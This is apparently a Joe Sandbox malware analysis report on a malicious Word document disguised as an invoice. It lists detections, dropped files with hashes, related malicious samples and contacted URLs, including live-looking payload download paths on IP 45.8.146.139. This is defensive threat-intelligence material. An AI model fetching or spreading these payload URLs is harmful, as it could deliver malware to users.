wpswireless-invoice-08.11.22.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\~DFDCA04E6C9BCC80E5.TMP	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmP	0%	Avira URL Cloud	safe
https://my.microsoftpersonalcontent.com	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm	0%	Avira URL Cloud	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://login.microsoftonline.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://shell.suite.office.com:1443	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://autodiscover-s.outlook.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://roaming.edog.	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://cdn.entity.	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://powerlift.acompli.net	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://cortana.ai	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://api.aadrm.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://api.microsoftstream.com/api/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://cr.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://graph.ppe.windows.net	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://officeci.azurewebsites.net/api/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmP	r3F3.tmp.exe, 00000003.00000002.298547030.0000000002BA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://my.microsoftpersonalcontent.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://globaldisco.crm.dynamics.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://messaging.engagement.office.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://dev0-api.acompli.net/autodetect	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://web.microsoftstream.com/video/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://dataservice.o365filtering.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://ncus.contentsync.	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
http://weather.service.msn.com/data.aspx	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://apis.live.net/v5.0/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://messaging.lifecycle.office.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://management.azure.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://outlook.office365.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://wus2.contentsync.	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://api.office.net	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://incidents.diagnosticssdf.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://entitlement.diagnostics.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://substrate.office.com/search/api/v2/init	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://outlook.office.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://outlook.office365.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://webshell.suite.office.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://management.azure.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://messaging.lifecycle.office.com/getcustommessage16	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://devnull.onenote.com	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://messaging.action.office.com/	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high
https://ncus.pagecontentsync.	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.8.146.139	unknown	Russian Federation		44676	VMAGE-ASRU	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682568
Start date and time:	2022-08-11 17:53:40 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	wpswireless-invoice-08.11.22.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.expl.winDOC@3/14@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 76.9%) Quality average: 59.8% Quality standard deviation: 39.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 13 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .doc Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.24, 52.109.76.34, 52.109.88.40, 20.54.89.106, 52.152.110.14
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
VT rate limit hit for: wpswireless-invoice-08.11.22.doc

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.8.146.139	courtesyautomotivedoc08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
	drinkcodeblue.file.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
	dodsonimaging,file,08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
	feltenberger doc 08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
	agsilverfile08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VMAGE-ASRU	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	courtesyautomotivedoc08.11.doc	Get hash	malicious	Browse	45.8.146.139
	drinkcodeblue.file.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	dodsonimaging,file,08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	feltenberger doc 08.11.doc	Get hash	malicious	Browse	45.8.146.139
	agsilverfile08.11.doc	Get hash	malicious	Browse	45.8.146.139
	GitmEGG60Q.exe	Get hash	malicious	Browse	45.159.251.68
	80J4pAFU0A.exe	Get hash	malicious	Browse	45.159.248.53
	Rwwsr82vkS.exe	Get hash	malicious	Browse	45.159.248.53
	sJq1pykxns.exe	Get hash	malicious	Browse	45.159.248.53
	3RkGCbnoKw.exe	Get hash	malicious	Browse	45.159.248.53
	60MLnq8Uma.exe	Get hash	malicious	Browse	45.159.248.53
	uGfpJynSWM.exe	Get hash	malicious	Browse	45.159.249.4
	MqYQkpHt4V.exe	Get hash	malicious	Browse	45.159.248.53
	0LYwkmJsgj.exe	Get hash	malicious	Browse	45.159.248.53
	P5u1ZAL6wF.exe	Get hash	malicious	Browse	45.159.248.53
	VbeTpPMvvK.exe	Get hash	malicious	Browse	45.159.248.53
	e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exe	Get hash	malicious	Browse	45.159.248.53
	aTlGCwT504.exe	Get hash	malicious	Browse	45.159.248.53
	a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exe	Get hash	malicious	Browse	45.159.248.53

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe	c.exe	Get hash	malicious	Browse
	edicomsrl file 18.07.doc	Get hash	malicious	Browse
	edicomsrl,document,18.07.doc	Get hash	malicious	Browse
	rbtGr2unq7.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll	Get hash	malicious	Browse
	QABqf4Xbw3.exe	Get hash	malicious	Browse
	ntelos.file.06.27.2022.doc	Get hash	malicious	Browse
	g.exe	Get hash	malicious	Browse
	S.exe	Get hash	malicious	Browse
	rB0luE6pL6.dll	Get hash	malicious	Browse
	I3Iz02L0Am.dll	Get hash	malicious	Browse
	svc32.dll	Get hash	malicious	Browse
	SecuriteInfo.com.DLOADER.Trojan.15098.dll	Get hash	malicious	Browse
	sIhckM7o37.exe	Get hash	malicious	Browse
	IhIrwzRKIW.exe	Get hash	malicious	Browse
	12CC7A3E17B45E971B1B950A6418E977D3FEDE2763FD7.exe	Get hash	malicious	Browse
	MkFX3RptDN.exe	Get hash	malicious	Browse
	zyvvMPPgTM.exe	Get hash	malicious	Browse
	P4j99xQeuA.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\63CA26CB-402D-484B-8FDD-9A1DCA3EDC07

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	148061
Entropy (8bit):	5.358172903110677
Encrypted:	false
SSDEEP:	1536:9cQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:s1Q9DQe+zuXYr
MD5:	0E298828328B8A95246773DCD6EA3410
SHA1:	4A1D1FE30105618756B0350CDD753743DEF124A8
SHA-256:	707D19CCBE7ED9206727C4ACC3610CC1A2585527ACA20977C207DB2DBA0F981E
SHA-512:	58759F718479854E688F6582AC09588F8A814B77DA303E62E9ED97881E4AD54E1EDC6C2F66B5C4AE32ACFD18070927874793F21C89C3F740DD59FC72EAEBBE6F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T15:57:58">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1C02F562.png

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PNG image data, 636 x 613, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	113730
Entropy (8bit):	7.990292786537194
Encrypted:	true
SSDEEP:	3072:ShIiMUFV26oUc72Dl+oj/Yc6oGqdxVJw0c8N2mirB0VZp:ShMggmEceUi8N2miK/
MD5:	E0B30095BE35E9494E5073277D4FC1A1
SHA1:	19D39B036989A331F5389E377FBE565436599894
SHA-256:	EA952A68D25232D981CDBE0CD6DA947A9386D4BFFD5D1BE2EF80C4A1246AC3E2
SHA-512:	A524907D5D60AA77DB0BA3A3BF114EA7F8AEA9190ADAA84A0C78F96EC8E333AB124D68C84863E83E735D602117B0F3422746C9C4A0D6823CC8B51B652C41972E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...\|...e......V.R.. .IDATx.....4.......~..:..t."...$......d..+...%Y.,V.(...7...03"""..O.......?>..y.}.v.&u......?0.....g.NH.............F...$..H.........km.%"D .=.f;..........A....O..w..,"n...U....N~?".....'...7w)A..l.+.....7....q\|..q.7?............v.f...6....x._<.On.WLm..>s<.-....."............"_..~a....f=..7.....P.~...,gD..:.P..,......c...;.B...q..1.>\|.....R.7m...7.......,".p7%.M.".:...9..P.8.!..?.... .)".......A..Z..rA.).g.7..'QD.......@$.......oC. .6w...lP...lN..1X...H.................q....X{.s..A......w..I....l`..t.C87.p.k...H>r...).,..n...Dd.R.c..xHs.nWv.......>.j.WCi........a...}.t\_....A.q..t..^A..Q..g.,..P.h.n.nm....7....YYT.............jl.....yR>s...w......\|.z..L.....\.FP.....QG...0.....2...@T.....C.....M...;...i....Y8...R.Y....~.;.CA........q....6`......~......2.g."...../..{x.( ...o..p...YW&+//[...........]....h....s....&...m_.)tG...s....<...].R..w..!.....A;.....I.,\.I@...&.....0[.\a?..`.#2upVW.4.{..c.JMZ..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\907D81FB.png

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	256329
Entropy (8bit):	7.977141461672348
Encrypted:	false
SSDEEP:	6144:jZEgQbgyMycNcpSdpXo+T8CSmnMbYVuGFv1lzrnZYDmkhRjULY+:jAgy66pSdpXfT82MkVuGFtlHn2SQYc+
MD5:	0E9FDA94725547962E5345A835CDCF42
SHA1:	05B164E58205AAFD76C0715531E48962263C051D
SHA-256:	C3EE631C65931589029588E3339FA42C142FA32852E1C2A3803ED0F50FA29B17
SHA-512:	4E167719158FE8790C563C363082EFC0F4057DCA3A6056C16764D2037419374BECC481D0BE82CE95E4A1BA09E26801EF2C19DBC74907807DAB277D0DF55E3AA1
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....fUu.Qc4.t..N..~.v'.F).4Ac.1dVc.X.8fP.....R(..."RT.....A...h...M.hh...(.Pu..G.>..........<.L..v..Z{.........4....L.h.nC\.......1....I....X..eA...<../..J.kw.t.D-.t...m....j..\|...F\...%.\|.....U..\|.U_...r..._.ji.m~l..>...x.......k.5..H...~.....0...6..2]..W..ek..{.....^i.t..f\..M.R..\|..'j?@.k.jh..h .o....Z..j.X.$=;...j...I..6.....v...R..+z2.@.'..4.\|+...c2..\..d3..j:....V....k.3.=....}.L.3.4.e.\..s.....'K..UC....Uy.....P.1Z".)WC.J.2uL.c.....=^.zzZ^.ZzE.W....t[....l.h.U.6=.V..VZ..hy)_.,Hz....-...f.`.H.,z.H^...o'x.@o.V.X.H=.L.'ZZMg......Vy.\+..A[...@..].'j.....WA>u.<.e.\|..K.l..qb......2.hic.:3?F_.ceZz.....3_.U..^.l..9..L.K.\|.N$...q..B[...t.A.nC..+f.<0&.R>.m...[.P.o.2$..'Z..=Z..g..D.[.Joy.'.h..Z..U..%Z...8..A.].>.f...J..1......`..$....MT....5...c.5_..j..J.t...e..8%R..%}.*?..i...'.K$.G..#.~..T..ao...g.g.'.+?Kg.Sf.\|...-o,_.r...^>im:.\..mHd>.%....j

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BA43D80B-197B-47FB-952A-5A1171D0EFB1}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	2.131668560158345
Encrypted:	false
SSDEEP:	12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lakwkvvlrvl/l/vlHllQvlwZZN/vlk:4LG1ND9Pxn82Ukbx5zWX
MD5:	7FC6EC55E6092E6A473B9DA94A48668A
SHA1:	DDF9AA1450EA5331A1F103AEFCD660E9C90A82F6
SHA-256:	ACF013DEDAB567BA31298F31D7525E276A5F5CE569A5DC9A586CF79E16675394
SHA-512:	5E1BBC3FD179F0C60482B56FE55F10FE475A0F259A61550367073D3EE732FC914B52AF8A13B10AD344B00D7869CA26B0D68B0398FEC036329614BD4646FE4547
Malicious:	false
Reputation:	low
